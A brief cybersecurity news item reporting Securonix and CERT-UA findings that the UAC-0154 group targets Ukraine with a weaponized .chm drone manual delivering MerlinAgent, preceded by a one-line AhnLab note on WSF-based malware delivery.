AhnLab cybersecurity researchers: The malware is downloaded and executed from a WSF file within a compressed file, delivered via URL in phishing emails.
Ukraine is under attack with a fake drone manual. Securonix cybersecurity researchers: The UAC-0154 threat actor is spreading MerlinAgent in a .chm file, as happened since July 2023
A Pilot-in-Command (PIC) Drone manual document has been used as a lure to deliver MerlinAgent by the UAC-0154 threat actor, Securonix cybersecurity researchers discovered it. The bait is a .chm file (instructions written in the Ukrainian language for a DJI Mavic 3 drone), weaponized to execute a PowerShell one-liner on the victim machine and deploy the malware. Furthermore, the attackers leveraged some complex TTPs and obfuscation methods in order to evade detection. CERT-UA has unveiled that one of the initial cases of using MerlinAgent dates back to the first half of July 2023, when Ukrainian government authorities were exposed to a phishing attack via email with the “CERT-UA recommendations on MS Office program settings” subject. Also in that case, the attachment was a weaponized .chm file.